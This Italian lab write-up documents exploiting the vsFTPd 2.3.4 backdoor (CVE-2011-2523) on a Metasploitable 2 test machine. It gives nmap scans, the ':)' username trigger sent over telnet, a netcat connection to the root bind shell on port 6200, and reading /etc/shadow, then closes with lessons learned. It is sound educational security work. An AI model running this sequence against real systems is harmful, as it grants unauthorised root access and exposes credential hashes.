
Progetto: vsFTPd 2.3.4 sfruttamento backdoor (CVE-2011-2523) su Metasploitable 2.
Questo progetto mostra un flusso di lavoro di penetration testing contro una macchina volutamente vulnerabile, Metasploitable 2. L'obiettivo era identificare, sfruttare e analizzare una vulnerabilità nota nel servizio FTP, ottenendo infine accesso a livello root e valutando l'impatto sulla sicurezza.
192.168.56.0/24)Verificato il sistema target e la sua configurazione di rete:
whoami
hostname
ifconfig

Confermata la connettività di rete tra attaccante e target:
ping 192.168.56.101

vsFTPd 2.3.4)Effettuata scoperta host:
nmap -sn 192.168.56.0/24
Identificati host attivi sulla rete.

nmap 192.168.56.101
Scoperte diverse porte aperte, tra cui:

nmap -sV 192.168.56.101
Identificato il servizio FTP in esecuzione:
vsFTPd 2.3.4
Una scansione completa dei servizi e basata su script è inclusa nei file di supporto: Output Scansione Nmap.

Il servizio FTP stava eseguendo una versione vulnerabile nota:
vsFTPd 2.3.4
Questa versione di vsFTPd è stata distribuita con una backdoor malevola che viene attivata quando un nome utente contenente :) viene utilizzato durante l'autenticazione.
Una volta attivata, il servizio apre una bind shell sulla porta 6200, consentendo l'accesso remoto non autorizzato.
Attivata la backdoor usando Telnet:
telnet 192.168.56.101 21
USER test:)
PASS test

Connesso alla backdoor usando Netcat:
nc 192.168.56.101 6200

whoami
root
Accesso root ottenuto con successo

Dopo aver ottenuto l'accesso root, è stata eseguita un'enumerazione di base del sistema:
cat /etc/passwd
cat /etc/shadow
/etc/shadow

Questo laboratorio dimostra come un singolo servizio vulnerabile possa portare a una compromissione totale del sistema. Evidenzia l'importanza di una corretta configurazione dei servizi, della gestione delle patch e della minimizzazione delle superfici di attacco esposte.
Era la prima volta che sfruttavo manualmente una backdoor reale. Ho imparato come una singola stringa di nome utente malevola (:)) possa attivare l'accesso root, il che ha rafforzato il motivo per cui l'enumerazione dei servizi e il rilevamento delle versioni sono così importanti nella ricognizione. Mi sono anche sentito più a mio agio con i comandi di base di post-exploitation in Linux, come leggere /etc/shadow e capire come appaiono realmente le credenziali hashate.
Questo era un ambiente di laboratorio controllato utilizzando Metasploitable 2, una macchina volutamente vulnerabile. La backdoor di vsFTPd 2.3.4 è una CVE nota (CVE-2011-2523) del 2011, quindi non riflette un impegno reale moderno. In una valutazione reale, sarebbero necessari ulteriori passaggi come elusione, bypass dei log o pivoting. Questo progetto si è concentrato sulla comprensione dei meccanismi principali dell'exploit, non su un test di penetrazione completo.